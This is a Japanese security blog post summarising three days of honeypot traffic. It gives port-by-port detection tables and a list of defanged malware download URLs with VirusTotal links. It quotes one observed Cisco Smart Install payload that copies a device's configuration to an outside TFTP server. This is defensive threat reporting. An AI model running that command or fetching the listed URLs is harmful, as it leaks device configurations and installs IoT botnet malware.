sec-chick Blog

サイバーセキュリティブログ

ハニーポット簡易分析(40-42日目:9/17-9/19)

9/17-9/19 のHonetyrapにおける簡易分析となります。
9/17までは Ethereumに関する通信が多かったですが、9/18には数が激減しました。
それ以降は特に通信の傾向変化はありませんでした。

◾️4786に関する通信について
 検知数は多くないですが、Cisco Smart Install Client が使用する 4786/tcp ポートに対する攻撃を観測していました。TFTPサーバからコンフィグを読み込んで、設定するような通信と思われます。ただし、xxxの部分はこのサーバのIPであり、IPからの通信があるかの調査行為かもしれません。
ペイロード
copy flash:/config.text tftp://222[.]211[.]78[.]73/xxx.xx.xxx.xxx.conf
 

◾️宛先ポートごとの検知数(80ポートを除く)

9/17 6561件
宛先ポート 件数 割合 サービス
8545 1,811 27.60% Ethereum
445 1,769 26.96% SMB
22 360 5.49% SSH
52869 78 1.19% D-Link, Realtek SDK
1433 70 1.07% Microsoft SQL Server
22022 64 0.98% ?
6379 54 0.82% Redis
3389 49 0.75% RDP
81 38 0.58% GoAhead Web Server 
5555 36 0.55% Android Debug Bridge

 

9/18 4746件
宛先ポート 件数 割合 サービス
445 1,824 38.43% SMB
22 671 14.14% SSH
3389 229 4.83% RDP
1433 74 1.56% Microsoft SQL Server
8080 73 1.54% Proxy
52869 46 0.97% D-Link, Realtek SDK
81 43 0.91% GoAhead Web Server 
636 34 0.72% LDAPS
6379 34 0.72% Redis
7657 33 0.70% ?

 

9/19 3089件
宛先ポート 件数 割合 サービス
445 1,540 49.85% SMB
3389 124 4.01% RDP
81 68 2.20% GoAhead Web Server 
22022 64 2.07% ?
1433 50 1.62% Microsoft SQL Server
52869 47 1.52% D-Link, Realtek SDK
8080 46 1.49% Proxy
6379 38 1.23% Redis
6666 36 1.17% IRC
137 32 1.04% NetBIOS Name Service

 

◾️マルウェアダウンロード
こちらは特に傾向の変化はありませんでした。

マルウェアURL 宛先ポート 件数 VT
hxxp://104[.]248[.]176[.]11/sora[.]mips 52869 4 https://www.virustotal.com/#/url/af74305b9f2f5f0fd8aa96f1c9a0dc9158136a4ba3161aea5f5caf69584e99a1/detection
hxxp://107[.]161[.]31[.]20/tenshimips 52869 20 https://www.virustotal.com/#/file/6222453c1c8e5c19425a6b75519210eae830e36ebcccc0d5882b9c14944593f3/detection
hxxp://107[.]191[.]99[.]230/elf[.]mips 52869 29 https://www.virustotal.com/#/file/5d72f22d6c387664b23cf4ea3080673885b73a9bea5caff7eb84fd3d0fd1a00b/detection
hxxp://107[.]191[.]99[.]41/elf[.]mips 52869 49 https://www.virustotal.com/ja/file/c5dff296b4f8a176223082527cd58402df2a7e5bcf4414f961d5312530ed5ee6/analysis/1533020160/
hxxp://146[.]185[.]253[.]127/keiji[.]mips 52869 4 https://www.virustotal.com/#/file/708f5e3b9c7e0b91f116b7c15c7f6f0a11499867afc2843ff4b890feae8e750a/detection
hxxp://176[.]32[.]33[.]165/mips 8081 1 https://www.virustotal.com/#/file/2a5336e77002a6ebbaa51206cb7a1142463b80bd1299b5a6635c1d3bd1533711/detection
hxxp://185[.]10[.]68[.]127/rtbin 52869 2 https://www.virustotal.com/ja/url/88391b0b3f2a711655750313557dc9cc13d2aa78a8741d5f395453164be5d7c4/analysis/
hxxp://188[.]209[.]52[.]142/c 5555 64 https://www.virustotal.com/#/url/8a392244d6648ac3fed7dcb98c79a24f89a5f6602ad007d2026e2cbf951547a8/detection
hxxp://207[.]148[.]78[.]152/bc 5555 3 https://www.virustotal.com/ja/url/c98d33aea5b9d6bbfc6db731d38ebdb16dfbaf65cb1896a628a0683f94b2b178/analysis/
hxxp://27[.]102[.]115[.]44/adbs2 5555 3 https://www.virustotal.com/ja/url/62fbd6898d5bd0adae9f5ad713b37f267d5b22c1b4b1ef564bcfa712f0fcf9b0/analysis/
hxxp://74[.]91[.]126[.]105/loli[.]lol[.]mips 52869 1 https://www.virustotal.com/#/url/8cc93d7feb2ed36620aa8c93d0cb4b548f00dde4c9dfddbb5c0790334e53f33b/detection
hxxp://77[.]87[.]77[.]250/izuku[.]mips 8081 1 https://www.virustotal.com/ja/file/b73ce9b0bd3fc58419443cbea301349af783d690ca1133d8548ea89d1bba003c/analysis/1535598509/
hxxp://80[.]211[.]106[.]251/mips 8081 4 https://www.virustotal.com/#/url/4869115c28db63cac236e2096511888609e4876831fbf67c229255157d7beffe/detection
hxxp://80[.]211[.]112[.]150/mips 52869 1 https://www.virustotal.com/ja/file/23a576856c353a434f8edf1d42c3c46beb48e8d39931043847ed193377decafe/analysis/1535606167/
hxxp://80[.]211[.]67[.]245/mips 52869 2 https://www.virustotal.com/#/file/0e344513a62220fcfe0ffebf9b722980eb74a155ff2c86e109311f7e3fe7375c/detection

以上、簡易分析となります。